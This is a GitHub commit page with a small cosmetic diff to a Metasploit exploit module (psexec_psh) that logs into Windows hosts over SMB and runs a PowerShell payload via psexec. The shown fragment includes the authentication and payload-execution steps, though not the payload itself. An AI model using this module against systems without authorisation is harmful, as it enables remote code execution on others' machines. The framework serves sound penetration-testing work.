Skip to content

Commit bc88732

Browse files
committed
Prints don't need to be rescued
1 parent 1a0bdf3 commit bc88732

File tree

1 file changed

+2
-3
lines changed

1 file changed

+2
-3
lines changed

modules/exploits/windows/smb/psexec_psh.rb

Lines changed: 2 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -81,7 +81,7 @@ def exploit
8181
fail_with(Exploit::Failure::BadConfig, "Select an x86 target and payload with RUN_WOW64 enabled")
8282
end
8383

84-
#Try and authenticate with given credentials
84+
# Try and authenticate with given credentials
8585
if connect
8686
begin
8787
smb_login
@@ -90,9 +90,8 @@ def exploit
9090
fail_with(Exploit::Failure::NoAccess, "#{peer} - Unable to authenticate with given credentials: #{autherror}")
9191
end
9292
# Execute the powershell command
93+
print_status("#{peer} - Executing the payload...")
9394
begin
94-
print_status("#{peer} - Executing the payload...")
95-
vprint_good(command)
9695
return psexec(command)
9796
rescue StandardError => exec_command_error
9897
disconnect

0 commit comments

Comments
 (0)